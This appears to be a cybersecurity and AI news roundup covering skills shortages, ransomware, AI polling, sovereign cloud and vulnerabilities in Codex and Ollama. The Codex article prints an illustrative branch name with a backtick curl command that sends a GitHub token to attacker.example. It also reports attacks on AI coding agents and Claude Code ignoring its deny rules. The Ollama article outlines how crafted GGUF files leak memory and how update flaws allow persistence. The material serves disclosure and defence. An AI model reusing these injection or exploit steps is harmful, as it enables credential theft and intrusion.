
India’s Cybersecurity Workforce Struggles to Keep Pace as AI and Cloud Systems Expand

 



India’s fast-growing digital economy is creating an urgent demand for cybersecurity professionals, but companies across the country are finding it increasingly difficult to hire people with the technical expertise required to secure modern systems.

A new study released by the Data Security Council of India and SANS Institute found that businesses are facing a serious shortage of skilled cybersecurity workers as technologies such as artificial intelligence, cloud computing, and API-driven infrastructure become more deeply integrated into daily operations.

According to the Indian Cyber Security Skilling Landscape Report 2025–26, nearly 73 per cent of enterprises and 68 per cent of service providers said there is a limited supply of qualified cybersecurity professionals in the country. The report suggests that organisations are struggling to build teams capable of handling increasingly advanced cyber risks at a time when companies are rapidly digitising services, storing more information online, and adopting AI-powered tools.

The hiring process itself is also becoming slower. Around 84 per cent of organisations surveyed said cybersecurity positions often remain vacant for one to six months before suitable candidates are found. This delay reflects a growing mismatch between industry expectations and the skills available in the job market.

Researchers noted that many applicants entering the cybersecurity workforce lack practical exposure to real-world security environments. Around 63 per cent of enterprises and 59 per cent of service providers said candidates often do not possess sufficient hands-on technical experience. Employers are no longer only looking for basic security knowledge. Companies increasingly require professionals who understand multiple areas at once, including cloud infrastructure, application security, digital identity systems, and access management technologies. Nearly 58 per cent of enterprises and 60 per cent of providers admitted they are struggling to find candidates with this type of cross-functional expertise.

The report connects this shortage to the changing structure of enterprise technology systems. Many organisations are moving away from traditional on-premise setups and shifting toward cloud-native environments, interconnected APIs, and AI-supported operations. As businesses automate more routine tasks, demand is gradually moving away from entry-level operational positions and toward specialised cybersecurity roles that require analytical thinking, threat detection capabilities, and advanced technical decision-making.

Artificial intelligence is now becoming one of the largest drivers of cybersecurity hiring demand. Around 83 per cent of organisations surveyed described AI and generative AI security skills as essential for future operations, while 78 per cent reported strong demand for AI security engineers. The findings also show that nearly 62 per cent of enterprises are already running active AI or generative AI projects, which experts say can create additional security risks if systems are not properly monitored and protected.

As companies deploy AI systems, the attack surface for cybercriminals also expands. Security teams are now expected to defend AI models, protect sensitive datasets, monitor automated systems for manipulation, and secure APIs connecting multiple digital services. Industry experts have repeatedly warned that many organisations are adopting AI tools faster than they are building security frameworks around them.

Some cybersecurity positions remain especially difficult to fill. The report found that almost half of service providers and nearly 40 per cent of enterprises are struggling to recruit security architects, professionals responsible for designing secure digital infrastructure and long-term defence strategies. Demand is also increasing for specialists in operational technology and industrial control system security, commonly known as OT/ICS security. These professionals help protect critical infrastructure such as manufacturing facilities, power systems, transportation networks, and industrial operations from cyberattacks.

At the same time, companies are facing growing retention problems. Around 70 per cent of service providers and 42 per cent of enterprises said employees are frequently leaving for competitors offering better salaries and career opportunities. Limited access to advanced training and upskilling programs is also contributing to workforce attrition across the sector.

The findings point to a larger issue facing the cybersecurity industry globally: technology is evolving faster than workforce development. Experts believe companies, educational institutions, and training organisations may need to work more closely together to create industry-focused learning pathways that prepare professionals for modern cyber threats instead of relying heavily on theoretical instruction alone.

With India continuing to expand digital public infrastructure, cloud adoption, fintech services, AI development, and connected industrial systems, cybersecurity professionals are expected to play a central role in protecting sensitive information, maintaining operational stability, and preserving trust in digital platforms.

AI Polling Reshapes Political Research as Firms Turn Conversations Into Data

 

Artificial intelligence is rapidly transforming the world of political opinion polling, replacing time-consuming human-led interviews with automated conversational systems capable of analysing public sentiment at scale.

"When you hear the word 'politician', what is the first image or emotion that comes to mind?"

The question is asked not by a human researcher, but by an AI-powered voice assistant. While a respondent shares his views over the phone, multiple AI systems simultaneously analyse the conversation. One verifies whether the person is answering the question correctly, another evaluates the depth of the response, while a third checks for possible fraud or bot-like behaviour.

The technology is being developed by Naratis, a French start-up focused on bringing artificial intelligence into political opinion research.

"The US has start-ups like Outset, Listen Labs and Hey Marvin that do AI polling like this in the commercial sphere. To my knowledge we're the first to do this for political opinion polling as well," says Pierre Fontaine, the 28-year-old engineer who founded the firm in 2025.

The emergence of AI-led polling marks a major shift for an industry traditionally dependent on manual interviews and extensive human analysis. In countries such as France, polling firms are increasingly exploring automation to reduce costs and speed up research processes.

Naratis specifically targets qualitative research, which is widely regarded as the most expensive and labour-intensive form of polling. Traditionally, these studies involve one-on-one interviews or focus groups that can take weeks to organise and analyse. By using conversational AI, the company says it can significantly reduce both time and cost.

Rather than relying on standard multiple-choice surveys, the platform encourages participants to engage in conversations with AI systems. "We don't ask people to tick boxes - they have a conversation with an AI," Fontaine explains. "That means we can explore not just what people think, but how they think - how they build their opinions, and even when those opinions change."

The company claims its approach is "10 times faster, 10 times cheaper and 90% as accurate as human polling".

According to the firm, projects that previously required weeks and substantial budgets can now be completed within a couple of days, with some responses collected in less than 24 hours. Fontaine describes this advantage as "parallelisation", where numerous AI agents conduct interviews simultaneously instead of relying on individual human researchers.

The rise of AI polling comes at a challenging time for the polling industry overall. Survey participation rates have dropped sharply over the decades, increasing operational costs and raising concerns about the reliability and representativeness of public opinion studies.

Supporters of AI polling argue that conversational systems may encourage respondents to be more honest, especially when discussing politically sensitive issues. Some researchers believe this could reduce social desirability bias, where people avoid expressing controversial opinions to human interviewers.

However, critics remain cautious about the growing dependence on AI in political research. Concerns include the possibility of AI systems generating inaccurate conclusions, producing overly generic responses, or creating misleading synthetic data.

Questions have also emerged around the use of "digital twins" and "synthetic people" — AI-generated profiles designed to imitate real human behaviour. While some market research firms use such tools for testing and simulations, many organisations remain reluctant to apply them in political polling.

At Ipsos, AI is already used extensively in consumer and behavioural research, including analysing user-recorded videos and studying social media activity. However, major firms continue to maintain human oversight in politically sensitive projects.

At OpinionWay, AI may assist with conducting interviews, but "we would never publish an opinion poll based on AI-generated data," says OpinionWay CEO Bruno Jeanbart, citing concerns about trust.

Experts believe the future of polling will likely involve a hybrid approach combining AI efficiency with human supervision. While automation can accelerate research and lower costs, human researchers are still considered essential for validating findings, interpreting nuance and ensuring accountability.

Even AI advocates acknowledge the need for caution. "The goal is end-to-end automation, but today it would be unsafe and socially unacceptable to remove humans entirely," says Le Brun.

As economic pressures continue to push the polling industry toward faster and cheaper methods, companies like Naratis are betting that AI-driven conversations could redefine how public opinion is collected and understood. Whether this transformation strengthens trust in polling or deepens public scepticism may ultimately depend on how responsibly the technology is implemented and regulated.

Ransomware Attacks Reach All Time High, Leaked Over 2.6 Billion Records

 

A recent analysis of last year's (2025) cybercrime data found that the number of ransomware victims rose sharply, up 45% year over year. More worrying still is attackers' heavy reliance on stolen credentials as their primary entry point. Whatever platforms you use and whatever accounts you are trying to protect, it is high time to start paying serious attention to password security.

State of Cybercrime report 2026


The report from KELA counted over 2.86 billion compromised credentials: passwords, session cookies, and other information that can be used to defeat two-factor authentication. Notably, authentication services and business cloud accounts made up over 30% of the data leaked in 2025.

The analysis also revealed that credential-stealing infostealer malware is indifferent to which operating system you run: “infections on macOS devices increased from fewer than 1,000 cases in 2024 to more than 70,000 in 2025, a 7,000% increase,” the report said.

Expert advice


Security writers at Forbes have warned about the risks of infostealer malware countless times, covering FBI operations aimed at shutting down cybercrime gangs, millions of Gmail passwords surfacing in leaked infostealer logs, and much more. The KELA analysis shows the risk has not abated; if anything, the damage is growing year after year.

About infostealer


KELA defines the malware as software “designed to exfiltrate sensitive data from compromised machines, including login credentials, authentication tokens, and other critical account information.” What is more troubling is the near-universal availability of malware-as-a-service operations in the infostealer underground: the barrier to entry has not merely been lowered but kicked down entirely, for expert and amateur threat actors alike.

Data compromise in billions

In 2025, KELA found around “3.9 million unique machines infected with infostealer malware globally, which collectively yielded 347.5 million compromised credentials.” The grand total comes to 2.86 billion hacked credentials across all sources: databases of infostealer logs and dark web criminal marketplaces.

Tricks used by infostealers:


Phishing-as-a-Service kits, delivered through AI-generated tailored scams, messaging apps, and email, are frequently used to get around MFA. In so-called "hack your own password" attacks, users are duped into manually running scripts in order to circumvent conventional security measures.

Trojanized software is promoted through malicious advertisements and poisoned search results, increasing the risk of infection. In supply chain attacks, poisoned packages and DevTools impersonation target high-privilege credentials. Compromised browser extension updates enable form-grabbing and cookie theft. Fake software updates and pirated apps also continue to be effective.

OpenAI Codex Bug Leads to GitHub Token Breach

 

In March 2026, researchers from BeyondTrust showed that a tailored GitHub branch name was enough to steal Codex’s OAuth token in cleartext. OpenAI classified the bug as “Critical P1”. Soon after, Anthropic’s Claude Code source code leaked into the public npm registry, and Adversa found that Claude Code silently ignored its own deny rules once a command exceeded 50 subcommands.

Malicious code in AI agents

These were not isolated vulnerabilities. They were the latest entries in a nine-month campaign in which six research teams revealed exploits against Copilot, Vertex AI, Codex, and Claude Code. Every exploit followed the same pattern: an AI agent held a credential, performed an action, and authenticated to a production system without any human session backing the request.

The attack surface was first showcased at Black Hat USA 2025, where experts hacked ChatGPT, Microsoft Copilot Studio, Gemini, Cursor, and many more on stage, with zero clicks. Within nine months, threat actors were abusing those same classes of credentials.

How a branch name in Codex compromised GitHub


Researchers at BeyondTrust found that Codex cloned repositories using a GitHub OAuth token embedded in the git remote URL. During cloning, the branch name was passed unsanitized into a setup script, allowing attacker-controlled data into the process. A backtick subshell and a semicolon were enough to turn a branch name into an exfiltration payload.
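The danger of interpolating an untrusted branch name into a shell command can be sketched as follows. This is an illustration of the general injection pattern, not BeyondTrust's actual payload; the branch name, repository URL, and attacker domain are hypothetical.

```python
import shlex

# Hypothetical attacker-controlled branch name: a backtick subshell plus a
# semicolon, of the kind BeyondTrust described. If this string is ever parsed
# by a shell, the embedded command runs with the caller's environment.
malicious_branch = "main`curl -s https://attacker.example/?t=$GITHUB_TOKEN`;"

# UNSAFE (illustrative): building a single shell string embeds the subshell
# directly into the command line.
unsafe_cmd = f"git clone --branch {malicious_branch} https://github.com/org/repo"

# SAFE: pass arguments as a list (e.g. to subprocess.run) so no shell ever
# parses the branch name; backticks and semicolons stay literal text.
safe_cmd = ["git", "clone", "--branch", malicious_branch,
            "https://github.com/org/repo"]

# If a shell string is unavoidable, shlex.quote() neutralises the
# metacharacters by wrapping the value in single quotes.
quoted = shlex.quote(malicious_branch)
print(quoted.startswith("'"))
```

The fix is the same whether the host is a coding agent or a CI script: never let untrusted repository metadata reach a shell unescaped.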

About the bug


The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. All reported issues have since been fixed in collaboration with OpenAI's security team.

This vulnerability allows an attacker to inject arbitrary commands through the GitHub branch name parameter. Using automated techniques, this can lead to the theft of a victim's GitHub User Access Token, the same token Codex uses to authenticate with GitHub.

Vulnerability impact


Because the attack can be automated, the vulnerability can scale to compromise many people interacting with a shared environment or GitHub repository.

“OpenAI Codex is a cloud-based coding agent, accessible through ChatGPT. It allows users to point the tool toward a codebase and submit tasks through a prompt. Codex then spins up a managed container instance to execute these tasks—such as generating code, answering questions about a codebase, creating pull requests, and performing code reviews against the selected repository,” said BeyondTrust.

Spotify Verified Badge Targets AI Music Confusion as Human Artist Authentication Expands

 

Now appearing beside artist profiles, Spotify’s new “Verified by Spotify” badge uses a green checkmark to highlight real human creators. Only accounts meeting the platform’s internal authenticity checks receive the label. Rather than algorithm-built personas, these profiles represent actual musicians behind the music. The rollout is happening gradually, changing how artists appear in searches, playlists, and recommendations. 

The update arrives as concerns continue growing around AI-generated music flooding streaming services. Spotify says verification depends on signals such as active social media accounts, consistent listener activity, merchandise listings, and live performance schedules - indicators suggesting a genuine person is tied to the profile. 

According to the company, these measures are designed to separate human creators from automated content increasingly appearing online.  Spotify says most artists users actively search for will eventually receive verification. Artists recognized for meaningful contributions to music culture are expected to be prioritized ahead of bulk-uploaded or mass-generated accounts. 

Over the coming weeks, the checkmarks will gradually appear across the platform, with influence and authenticity carrying more weight than upload volume. The move comes as streaming platforms face mounting criticism over how they handle AI-generated tracks. While the badge confirms a profile belongs to a real person, some critics quickly pointed out that it does not indicate whether artificial intelligence was used to help create the music itself. 

Questions around what counts as “real” music continue growing as AI tools become more involved in production. Creator-rights advocate and former AI executive Ed Newton-Rex warned that systems like Spotify’s may unintentionally disadvantage independent musicians who do not tour, sell merchandise, or maintain strong social media visibility. 

Instead, he suggested platforms should directly label AI-generated songs rather than relying solely on artist verification. Experts also note that defining AI involvement in music is increasingly difficult. Professor Nick Collins from Durham University described AI-assisted music creation as a broad spectrum rather than a simple divide between human-made and machine-made work. Many songs now involve software-assisted mixing, mastering, composition, or editing, making it far harder to classify music by origin alone. 

Spotify has faced years of criticism over AI-generated audio. Across forums and online communities, users have repeatedly called for clearer labels showing whether tracks were created by humans or algorithms. Some developers have even built independent tools aimed at detecting and filtering AI-generated songs on the platform. Concerns intensified after projects like The Velvet Sundown attracted large audiences despite having no interviews, live performances, or publicly traceable history. 

The group later described itself as a “synthetic music project” supported by artificial intelligence, fueling debate around transparency in digital music spaces. Spotify’s latest verification effort appears aimed at rebuilding trust while balancing support for evolving AI technologies. The move also reflects a broader trend across digital platforms, where companies are introducing verification systems to distinguish human-created content from synthetic material as AI-generated media becomes harder to identify.

Friendly AI Chatbots More Likely to Give Wrong Answers, Study Finds

 

Artificial intelligence chatbots that are designed to sound warm, friendly, and empathetic may be more likely to give wrong or misleading answers than their more neutral counterparts, according to a new study by researchers at the Oxford Internet Institute (OII). The findings raise concerns about how much users can trust AI assistants that have been deliberately tuned to feel more human‑like and emotionally supportive. 

What the study found 

The researchers analyzed over 400,000 responses from five major AI systems that had been modified to communicate in a more amiable, empathetic tone. They discovered that these “warm models” produced more factual errors than the original, less friendly versions, with error rates rising by an average of 7.43 percentage points across tasks. In some cases, the warm‑modeled chatbots not only gave incorrect information but also reaffirmed users’ mistaken beliefs, particularly when expressing emotion.

The OII team describes this as a “warmth‑accuracy trade‑off”: the more the models are optimized to be agreeable and supportive, the more their reliability drops. Lead author Lujain Ibrahim told the BBC that, like humans, AI can struggle to deliver honest but uncomfortable truths when its main goal becomes being likable rather than being accurate. This mimics a human tendency to soften harsh feedback to avoid conflict, but in an AI context it can mean dangerous misinformation, especially on topics like health or legal advice. 

 Risks for users

The risk is especially serious because people are increasingly using chatbots for emotional support, mental‑health guidance, or even medical and financial advice. If a friendly AI constantly agrees with users or gives reassuring but false answers, it can reinforce harmful misconceptions instead of correcting them. The study notes that such “warm” tuning can create vulnerabilities that do not exist in the original, less sociable models, making it crucial for users and developers to treat these systems as fallible tools rather than infallible experts. 

The paper urges developers to rethink how they fine‑tune chatbots for companionship or counseling, emphasizing the need to balance empathy with factual rigor. Some industry leaders have already warned against “blindly trusting” AI outputs, and many platforms now include prominent disclaimers about potential inaccuracies. However, the OII research suggests that simply making an AI sound more friendly can quietly increase those risks, meaning future design choices must explicitly prioritize truthfulness over artificial charm.

Why Europe Is Rethinking Its Dependence on US Cloud Providers




Concerns around digital sovereignty are rapidly becoming one of the most important debates shaping the future of cloud computing, artificial intelligence, and government technology infrastructure across Europe and the UK.

The discussion recently gained attention after Chi Onwurah, chair of the UK Science, Innovation and Technology Select Committee, criticized Britain’s broader technology strategy and warned about growing dependence on a small group of major US technology companies. Her remarks pointed to reliance on providers such as Microsoft and Amazon Web Services, while also referencing Palantir Technologies because of its involvement in NHS and defence-related contracts. She also raised concerns about foreign-controlled technology supply chains supporting critical public infrastructure.

At the centre of the debate is the meaning of “digital sovereignty,” a term that is increasingly used by governments but often interpreted differently. In practical terms, sovereignty refers to a country maintaining legal authority and control over its citizens’ sensitive data, including where that information is processed, accessed, and governed. Experts argue that sovereign data should only fall under the jurisdiction of the nation to which it belongs, rather than being exposed to foreign legal systems or overseas regulatory reach.

The issue has become especially significant in the era of public cloud computing. Before large-scale cloud adoption, most government and enterprise data was stored and processed inside domestic datacentres, limiting both physical and remote access to national borders. While foreign software vendors occasionally required access for maintenance or support purposes, control over infrastructure largely remained local.

That model changed as governments and businesses increasingly adopted cloud services operated by US-headquartered providers. As organizations shifted toward subscription-based cloud platforms, concerns began emerging over whether sensitive national data could still be considered sovereign if it was processed through globally distributed infrastructure.

Much of the modern sovereignty debate intensified following the Schrems II ruling, a landmark European court decision that challenged how personal data could be transferred outside the EU to countries viewed as having weaker privacy protections. Since then, governments across Europe have pushed for tighter oversight of where data travels and who ultimately controls cloud infrastructure.

Although sovereignty concerns are often framed as a problem tied only to hyperscalers, industry analysts say the challenge is broader. Companies including IBM, Oracle Corporation, and Hewlett Packard Enterprise also face pressure to adapt their cloud and data processing models to meet stricter sovereignty expectations.

The debate has also been intensified by geopolitical tensions. European governments have become increasingly cautious about long-term dependence on foreign-owned digital infrastructure, particularly as cloud computing and artificial intelligence become more deeply connected to defence, healthcare, and public services. Analysts note that data infrastructure is now being viewed similarly to energy or telecommunications infrastructure: strategically important and politically sensitive.

Among the prominent providers, Microsoft was one of the earliest companies to experiment with sovereign cloud initiatives, including a dedicated German version of Microsoft 365. However, that model was eventually discontinued in 2022. Critics argue the company now faces greater difficulties adapting because many of its cloud services operate through highly interconnected global systems spread across more than 100 countries.

Questions around transparency have also created challenges. Reports previously indicated that Microsoft struggled to provide detailed information about certain data flows when requested by the Scottish Police Authority under data protection obligations. Investigative reporting from ProPublica also stated that US authorities encountered similar difficulties while attempting to evaluate Microsoft cloud services under FedRAMP certification requirements for government environments.

Additional scrutiny has emerged around Microsoft’s artificial intelligence infrastructure plans. The company had previously indicated that in-country AI processing capabilities for Copilot services in the UK would arrive by the end of 2025, though timelines have reportedly shifted into 2026. Some European customers are also expected to receive regional AI processing instead of fully sovereign national deployments.

Industry experts increasingly categorize sovereign cloud approaches into multiple levels. One common method involves creating “data boundaries,” where providers attempt to restrict where customer data is stored or processed while still operating under global cloud architectures. Critics argue this model may not fully satisfy stricter interpretations of sovereignty because some operational control can still remain overseas.

A second approach focuses on partnerships with local operators that manage sovereign services regionally. Amazon Web Services has promoted its European Sovereign Cloud initiative using this framework, arguing that the platform aligns with EU regulatory requirements. However, some analysts contend that EU-level governance is not the same as national sovereignty, particularly for non-EU countries such as the UK. Concerns have also been raised over whether US legislation, including the CLOUD Act, could still apply in certain circumstances.

Meanwhile, Google Cloud has attracted attention through its partnership with French defence and technology company Thales Group. Their joint venture, S3NS, is designed around France-specific sovereign infrastructure with air-gapped operations, meaning the systems can function independently without continuously communicating with external global networks for updates or validation checks.

Security specialists consider air-gapped architecture an important benchmark for sovereign cloud environments because it reduces reliance on foreign operational control. Google’s Distributed Cloud Air-Gapped platform is currently viewed by some analysts as one of the more mature sovereign cloud offerings available, despite still lacking some features present in its broader public cloud ecosystem.

The approach has already attracted major defence-related interest. France, NATO members, and the German military have all shown interest in sovereign infrastructure models, while the UK Ministry of Defence recently announced a £400 million contract spanning five years tied to these types of capabilities.

Competing alternatives are still evolving. AWS offers LocalStack-focused options largely aimed at development environments, while Microsoft’s disconnected Azure Local products have faced criticism from some analysts who argue the offerings remain less mature than competing sovereign platforms.

Despite rapid investment, experts say the sovereign cloud market is still in its early stages. Google’s France-based partnership model currently appears to offer one of the clearest examples of locally controlled hyperscale infrastructure, while AWS continues refining its European-focused model and Microsoft works through broader architectural and transparency challenges.

At the same time, the sovereignty movement may create new opportunities for regional cloud providers and domestic technology companies. However, analysts warn that building competitive sovereign infrastructure will require long-term investment, government support, and procurement strategies that allow interoperability between multiple vendors rather than locking public institutions into a single provider.

Many experts believe the future of sovereign technology infrastructure will likely depend on hybrid and partnership-driven models combining hyperscale cloud capabilities with locally managed operations. Supporters of the S3NS approach argue it offers an early blueprint for how global cloud providers and national operators could collaborate while still preserving local control over sensitive data and critical digital systems.

Remote Exploitation Risk Emerges From Ollama Out-of-Bounds Read Flaw


 

Growing reliance on locally deployed large language model infrastructure has renewed scrutiny of the security posture of self-hosted artificial intelligence platforms, after researchers revealed a critical vulnerability in Ollama that could let remote attackers read sensitive process memory without authorization.

CVE-2026-7482, rated 9.1 on the CVSS severity scale, is an out-of-bounds read vulnerability that can expose large portions of memory belonging to running Ollama processes, including user prompts, system instructions, configuration data, and environment variables. Because Ollama is widely used as a local inference platform for open-source large language models such as Llama and Mistral, the disclosure has raised significant concern in the artificial intelligence and cybersecurity communities.

Ollama lets organizations and developers run AI workloads directly on their own infrastructure rather than through external cloud providers. With approximately 170,000 stars on GitHub, over 100 million Docker Hub downloads, and a deployment footprint of nearly 300,000 internet-accessible servers, the platform illustrates both the speed at which artificial intelligence ecosystems are being adopted and the sensitivity of the operational data they process.

Cyera, which identified the vulnerability and dubbed it Bleeding Llama, traced it to insecure handling of GGUF model files within Ollama: the server implicitly trusts tensor dimension values embedded inside uploaded models without performing adequate boundary validation. By crafting specially formed GGUF files, an attacker can exploit this design weakness to manipulate memory access operations during model processing, forcing the application to read data outside its intended buffers and to incorporate fragments of sensitive runtime information into the model artifacts it generates.

The underlying problem lies in the GPT-Generated Unified Format (GGUF), which is widely used to package and distribute large language models for efficient local execution. Like PyTorch's .pt and .pth formats, safetensors, and ONNX, GGUF enables developers to store and run open-source models directly on local machines without external resources.

The vulnerability arises from the way Ollama processes these files during model creation, specifically through the use of Go's unsafe package within a function known as WriteTo(). Because the implementation relies on low-level memory operations that bypass the language's standard safety protections, it inadvertently exposes the heap to out-of-bounds reads when malicious tensor metadata is supplied.

In a typical attack scenario, the vulnerability is exploited by crafting a GGUF file with intentionally oversized tensor shape values and sending it to an exposed Ollama instance via the /api/create endpoint. The manipulated dimensions force the application to access memory regions outside the allocated boundaries during parsing and model generation, unintentionally disclosing sensitive information held in the Ollama process space.
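The flaw class is easiest to see in a parser sketch. The following Python fragment is illustrative only: Ollama's actual parser is written in Go, and the single-tensor file layout here is a simplified stand-in for GGUF. It shows the boundary check that, according to the researchers, was missing: validating an embedded tensor size against the bytes actually present before reading.

```python
import struct

def read_tensor(buf: bytes, offset: int) -> bytes:
    """Read one tensor from a toy model file: a little-endian uint64
    element count followed by that many float32 values.

    A memory-unsafe implementation that trusts the embedded count
    (as described for the GGUF flaw) would read past the end of the
    buffer; here the claimed size is checked against the bytes that
    are actually present before any access happens.
    """
    (count,) = struct.unpack_from("<Q", buf, offset)
    data_start = offset + 8
    needed = count * 4  # float32 elements, 4 bytes each
    if data_start + needed > len(buf):
        # An oversized tensor shape lands here instead of leaking memory.
        raise ValueError(
            f"tensor claims {count} elements ({needed} bytes) "
            f"but only {len(buf) - data_start} bytes remain"
        )
    return buf[data_start : data_start + needed]
```

A file whose header claims billions of elements but carries only a few bytes of data is exactly the malformed input described above; with the check in place it is rejected rather than parsed.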

According to researchers, the exposed memory may contain environment variables, authentication tokens, API credentials, system prompts, and portions of concurrent user interactions processed by the same instance. Unlike conventional exploitation techniques, CVE-2026-7482 acts as a silent disclosure mechanism, leaking data without crashes, visible failures, or immediate forensic indicators.

For internet-accessible deployments, the attack chain itself is relatively straightforward, which significantly lowers the bar for remote exploitation. Attackers can upload malicious GGUF models through the unauthenticated /api/create endpoint, where the manipulated tensor dimensions coerce Ollama into harvesting unintended memory regions during parsing and artifact generation.

The resulting artifact, now containing sensitive process data, can then be exported through the unauthenticated /api/push endpoint, allowing covert exfiltration of the stolen information. Because many Ollama instances remain directly exposed to the internet without adequate access restrictions, security researchers say the vulnerability poses a particularly serious risk to enterprises and developers who assume that self-hosted deployments provide a higher degree of data isolation.

Analysts warn that the “Bleeding Llama” vulnerability significantly increases the risks associated with self-hosted artificial intelligence infrastructure, since unauthenticated attackers can gain direct access to the active memory space of the Ollama process without prior access or user involvement.

Combined with the platform's widespread adoption by enterprises and developers, the simplicity of exploitation turns the issue from a single software defect into a large-scale exposure concern for organizations whose sensitive workloads rely on locally deployed language models. Unlike conventional vulnerabilities that cause service disruption, memory disclosure flaws of this nature can silently compromise valuable operational and proprietary data for extended periods.

Researchers indicate that attackers could potentially extract confidential model weights, enabling intellectual property theft or the reconstruction of internally customized AI systems, as well as harvest sensitive prompts, business data, and user inputs processed by active models.

Exposed memory may also reveal infrastructure details, authentication tokens, API credentials, and runtime configuration information that could facilitate further network compromise. Beyond the immediate technical risks, such incidents are likely to harm organizations that are increasingly integrating artificial intelligence systems into critical operations, especially where privacy and local data control are core components of their deployments.

The disclosure process was initially complicated by the absence of an official CVE identifier, though security teams across the industry have actively tracked the issue. Defenders say organizations should prioritize rapid mitigation: upgrading to patched Ollama releases as soon as they are available, limiting public network exposure, implementing strict firewall and access control policies, and running the service under least privilege to limit the impact of any compromise.

Security professionals further recommend continuous monitoring for network anomalies, infrastructure audits for misconfigurations, and, in highly sensitive environments, deployment within isolated or segmented networks to reduce the attack surface of internet-accessible artificial intelligence systems.
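As a first-pass check on the exposure described above, a defender can test whether a host answers Ollama's unauthenticated REST API at all. A minimal sketch (the target address used in the usage note is a placeholder from the 192.0.2.0/24 documentation range; probe only infrastructure you own):

```python
import urllib.request
import urllib.error

def ollama_exposed(host: str, port: int = 11434, timeout: float = 3.0) -> bool:
    """Return True if an Ollama-style REST API answers without credentials.

    /api/tags lists installed models and, like /api/create and /api/push
    discussed above, requires no authentication on a default deployment.
    """
    url = f"http://{host}:{port}/api/tags"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status == 200
    except (urllib.error.URLError, OSError):
        # Connection refused, filtered, or timed out: not reachable.
        return False
```

Running `ollama_exposed("192.0.2.10")` against a properly firewalled or loopback-only instance should return False; a True result from an internet-facing address is a signal to restrict access before the endpoints above can be abused.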

Compounding the disclosure surrounding "Bleeding Llama", Striga researchers have identified two separate vulnerabilities that can be chained for persistent code execution in the Windows implementation of Ollama. The researchers determined that the Windows desktop client is launched automatically at login through the Windows Startup folder and listens locally on 127.0.0.1:11434.

The client periodically checks for updates via the /api/update endpoint, and pending installers are executed the next time the application starts. The attack chains a missing signature verification flaw, CVE-2026-42288, with a path traversal vulnerability, CVE-2026-42249, both of which have been assigned CVSS scores of 7.7.

According to the researchers, installer signatures are not validated before execution, and staging paths are constructed directly from HTTP response headers without proper sanitization, allowing malicious files to be written to attacker-controlled locations. In scenarios where an adversary can manipulate update responses, for example by redirecting the OLLAMA_UPDATE_URL configuration to a controlled HTTP server while automatic updates remain enabled by default, the flaws may allow arbitrary executables to be silently deployed and executed during system login.

The signature verification issue alone may allow temporary code execution from the staging directory, but when combined with the path traversal weakness, persistence can be achieved by writing payloads outside the expected update path, where subsequent legitimate updates cannot overwrite them.

Ollama for Windows versions 0.12.10 through 0.17.5 are affected. Users are advised to disable automatic updates and remove Ollama shortcuts from the Windows Startup directory until patches become available.

The expanding scope of the Ollama vulnerabilities points to a broader security challenge across the rapidly evolving artificial intelligence ecosystem, where convenience-driven deployment models are colliding with enterprise-grade security expectations.

As organizations increasingly adopt self-hosted large language model infrastructure to retain greater control over sensitive data and inference workloads, researchers warn that insufficient hardening, exposed interfaces, and insecure update mechanisms can turn locally deployed AI environments into high-value attack targets.

Memory disclosure flaws, unauthenticated attack paths, and weaknesses in update workflows are making AI infrastructure increasingly attractive to malicious actors, both opportunistic and sophisticated, seeking access to proprietary models, credentials, and operational intelligence.

Several security experts maintain that artificial intelligence platforms cannot be treated as experimental development tools operating outside traditional security governance; instead, they must be integrated into the same rigorous vulnerability management, network segmentation, monitoring, and software lifecycle practices applied to critical enterprise systems.

Ransomware Victims Jump 45% in 2025 as Stolen Credentials Fuel Global Cybercrime Surge

 

A newly released cybercrime analysis has revealed a dramatic rise in ransomware activity during 2025, with the number of victims increasing by 45% compared to the previous year. However, cybersecurity experts say the bigger concern lies in the growing dependence on stolen credentials as the main entry point for cyberattacks.

According to the State of Cybercrime 2026 report published by KELA, researchers identified nearly 2.86 billion compromised credentials, including passwords and session cookies capable of bypassing two-factor authentication (2FA). More than 30% of the exposed data originated from business cloud platforms and authentication services throughout 2025.

The report also highlighted a sharp increase in malware infections targeting Apple users. “infections on macOS devices increased from fewer than 1,000 cases in 2024 to more than 70,000 in 2025, a 7,000% increase,” the report confirmed.

Cybersecurity researchers have repeatedly warned about the growing threat posed by infostealer malware. Despite multiple law enforcement crackdowns and investigations into cybercriminal groups operating stolen password databases, the threat landscape continues to worsen year after year.

KELA described infostealer malware as software “designed to exfiltrate sensitive data from compromised machines, including login credentials, authentication tokens, and other critical account information.” The report further noted that the rise of malware-as-a-service platforms has significantly lowered the barrier for cybercriminals, making these tools widely accessible.

Between January 1 and December 31, 2025, KELA stated that it “observed approximately 3.9 million unique machines infected with infostealer malware globally, which collectively yielded 347.5 million compromised credentials.” Across all monitored criminal marketplaces and leaked databases, the total number of compromised credentials tracked reached 2.86 billion.

The report identified several major attack methods commonly used by infostealer operators during 2025:
  • Email and messaging scams powered by AI-generated personalization, often bypassing MFA through Phishing-as-a-Service operations.
  • Social engineering tactics that trick users into manually running malicious scripts, known as “hack your own password” attacks.
  • Malicious advertisements and fake search engine results distributing trojanized software.
  • Supply chain attacks involving poisoned software packages and fake developer tools targeting privileged accounts.
  • Compromised browser extension updates enabling cookie theft and form-grabbing attacks.
  • Pirated applications and counterfeit software updates continuing to spread infections effectively.
Security experts recommend several preventive measures to reduce exposure to these attacks. Users are advised to keep operating systems and software updated only through official sources and avoid clicking links from unsolicited emails or messages, even if they appear legitimate.

Experts also stress the importance of using password managers to prevent password reuse across multiple accounts, limiting the damage caused by a single breach. Enabling two-factor authentication on all supported accounts remains essential, although attackers are increasingly using session-cookie theft to bypass MFA protections.

To strengthen account security further, cybersecurity professionals are encouraging users to adopt passkeys instead of traditional passwords wherever possible. Passkeys offer built-in phishing resistance, are randomly generated, and do not share private authentication keys during sign-ins, making them significantly harder for infostealer malware to compromise.

Purple Team Myth Exposed: Why It's Just Red vs Blue in 2026

 

Many organizations tout their "purple teams" as the pinnacle of cybersecurity collaboration, blending offensive red team tactics with defensive blue team strategies. However, a critical issue persists: these teams often remain siloed, functioning more like red and blue in disguise rather than a true integrated purple force. This misnomer stems from superficial exercises where attackers simulate breaches while defenders watch passively, failing to foster real-time learning or adaptive defenses. 

